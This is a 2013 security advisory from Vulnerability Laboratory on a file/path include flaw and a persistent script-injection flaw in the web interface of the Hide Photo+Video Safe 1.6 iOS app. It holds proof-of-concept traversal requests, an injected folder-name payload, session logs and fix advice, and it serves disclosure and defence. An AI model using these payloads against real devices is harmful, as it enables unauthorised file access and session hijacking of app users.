Title: ====== Hide Photo+Video Safe v1.6 iOS - Multiple Vulnerabilities Date: ===== 2013-09-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1083 VL-ID: ===== 1083 Common Vulnerability Scoring System: ==================================== 6.7 Introduction: ============= With it, you can lock and manage your private photos & videos very easily! Yyou can protect your privacy very securely with lots of features! Support dot lock & password lock! Manage Folders - Create, Cut, Copy, Delete, Rename, Search folders - Hide, encrypt folders - Multiple folders can be handled at a time Manage Files - Add photos, videos from computer, camera or photo library - Sort by Date, Type, Name, Size, Ascending or Descending(click again to switch) - Cut, Copy, Delete, Rename, Search, Hide files - Multiple files can be handled at a time Support Viewing many file formats - Photo: jpg, png, bmp, gif, tif, tiff, jpeg - Video: mov, mp4, m4v, mpv Security - You can lock/unlock the app with password - Support decoy accounts to protect your real privacy - With only one password, you can easily lock or unlock any folder - With the password of the current user, you can hide or show any folder/file - The Q&A for password resetting can be added or modified optionally Communicate with computer - Wi-Fi web access for download and upload. Support viewing files on browser and uploading multiple files at a time. - USB Import/Export multiple folders or files from/to iTunes File Sharing - You can store any media file you like, the importing files will be sorted automatically into 2 kinds: Photo, Video - The exporting files/folders will be merged into one folder called Export in iTunes. - For security reason, they will be moved back to app once you stop exporting - Import/Export multiple folders or files from/to iTunes in current directory simply (Copy of the Homepage: https://itunes.apple.com/de/app/hide-photo+video-safe-free/id463142728 ) Abstract: ========= The Vulnerability Laboratory discovered multiple web vulnerabilities in the Hide Photo+Video Safe - Dot Lock Private Photos Vault 1.6 iOS application. Report-Timeline: ================ 2013-09-22: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: Hide Photo+Video Safe - Dot Lock Private Photos Vault 1.6 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== 1.1 A local file/path include web vulnerability is detected in the Hide Photo+Video Safe - Dot Lock Private Photos Vault 1.6 iOS application. The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. The vulnerability is located in the uploadify/swfobject.js file when processing to add (upload) files with manipulated filenames as picture via POST method request. The attacker can inject local path or files to request resources and compromise the mobile device or web service. The validation has a bad side effect which impacts the risk to combine the attack with persistent injected script code. Exploitation of the local file include web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the device or application. Vulnerable Application(s): [+] Hide Photo+Video Safe v1.6 iOS - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload - (http://localhost:5555/uploadify/swfobject.js ) Vulnerable Parameter(s): [+] filename (picture|image) Affected Module(s): [+] Index File Dir Listing (http://localhost:5555/?../../../[x]) 1.2 A persistent input validation web vulnerability is detected in the Hide Photo+Video Safe - Dot Lock Private Photos Vault 1.6 iOS application. The bug allows remote attackers to implement/inject own malicious persistent script codes (application side) via POST method. The vulnerability is located in the `Add Folder` module of the web-server interface (http://localhost:555) when processing to add via POST method manipulated `folder names`. The folder name will be changed to the path value without secure filter, encode or parse mechanism. The injected script code gets executed in the main index file dir folder listing of the mobile application. Exploitation of the persistent web vulnerability requires low user interaction and no privilege application user account with a password. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or persistent module context manipulation. Vulnerable Application(s): [+] Hide Photo+Video Safe v1.6 iOS - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Add Folder Vulnerable Parameter(s): [+] foldername [+] path Affected Module(s): [+] Path Dir Listing (http://localhost:5555/[x]) Proof of Concept: ================= 1.1 The local file include web vulnerability can be exploited by remote attackers without privileged application user account and also without user interaction. For demonstration or reproduce ... --- PoC Request/Response Session Log --- Status: 200[OK] GET http://localhost:5555/TLI?/Picture/\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] Load Flags[VALIDATE_ALWAYS ] Content Size[3372] Mime Type[application/x-unknown-content-type] Request Headers: Host[localhost:5555] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:5555/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[3372] Date[Sa., 21 Sep 2013 20:38:08 GMT] Status: Loaded from cache[Loaded from cache] GET http://localhost:5555/img/uploadify.swf Load Flags[LOAD_FROM_CACHE ] Content Size[-1] Mime Type[unknown] Request Headers: Host[localhost:5555] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Response Headers: Status: Loaded from cache[Loaded from cache] GET http://localhost:5555/uploadify/swfobject.js Load Flags[LOAD_FROM_CACHE ] Content Size[-1] Mime Type[unknown] Request Headers: Host[localhost:5555] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Response Headers: Status: Loaded from cache[Loaded from cache] GET http://localhost:5555/TLI?/Picture/\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] Load Flags[LOAD_FROM_CACHE ] Content Size[-1] Mime Type[unknown] Request Headers: Host[localhost:5555] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] PoC: File Include as File Name (Image) <div style="height: 516px;" class="content" id="content"><table><tbody><tr><td><div class="itemFrame" id="0"> <div class="imageFrame"><img src="My%20Media%20WiFi %20Manager_files/TLI.png" class="image" id="0"></div><div style="height:20px; overflow:hidden;" align="center"> <label class="name">\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] </label></div><div align="center"><a href="#" class="command" id="del_0">delete</a> <a class="command" href="http://localhost:5555/DNL?/Picture/\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] ">download</a></div></div></td> <td><div class="itemFrame" id="1"><div class="imageFrame"><img src="My%20Media%20WiFi%20Manager_files/TLI_002.png" class="image" id="1"></div> <div style="height:20px; overflow:hidden;" align="center"><label class="name">s21</label></div><div align="center"> <a href="#" class="command" id="del_1">delete</a><a class="command" href="http://localhost:5555/DNL?/Picture/asdasd/s21.png">download</a></div></div></td></tr></tbody></table></div> Reference(s): http://localhost:5555/# http://localhost:5555/Picture/[PATH!] 1.2 The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction. For demonstration or reproduce ... Payload: </>%20<img%20src=http://www.vulnerability-lab.com/x.*> --- PoC Request/Response Session Log --- Status: 200[OK] GET http://localhost:5555/ADD?/Picture/ Load Flags[LOAD_BACKGROUND ] Content Size[43] Mime Type[application/x-unknown-content-type] Request Headers: Host[localhost:5555] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[application/json, text/javascript, */*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-Requested-With [XMLHttpRequest] Referer[http://localhost:5555/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[43] Date [Sa., 21 Sep 2013 20:30:38 GMT] Status: 200[OK] GET http://localhost:5555/a Load Flags[LOAD_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type] Request Headers: Host[localhost:5555] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:5555/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[0] Date[Sa., 21 Sep 2013 20:30:38 GMT] PoC: Add Folder of Pictures - Folder/Path Name <div class="itemFrame" id="1"><div class="imageFrame"><img src="/TLI?/Picture/asdasd/s21.png" class="image" id="1"></div><div style="height:20px; overflow:hidden;" align="center"> <label class="name">s21</label></div><div align="center"><a href="#" class="command" id="del_1">delete</a><a class="command" href="DNL?/Picture/asdasd/s21.png">download</a></div></div> Reference(s): http://localhost:5555/PRE?/Picture http://localhost:5555/TLI?/Picture/[PATH]/ http://localhost:5555/ADD?/Picture/ Solution: ========= 1.1 The file include web vulnerability can be patched by a secure encoding and filter restriction of the file-names. Also encode and parse the vulnerable path listing value. Implement a secure exception-handling to filter and prevent malicious executions. 1.2 The persistent input validation web vulnerability can be patched by a secure encoding of the add folder function input. Also encode and parse the output listing in the main index and sub folders. Risk: ===== 1.1 The security risk of the local file include web vulnerability is estimated as high(+). 1.2 The security risk of the persistent input validation web vulnerability is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@xxxxxxxxxxxxxxxxxxxxx - research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@xxxxxxxxxxxxxxxxxxxxx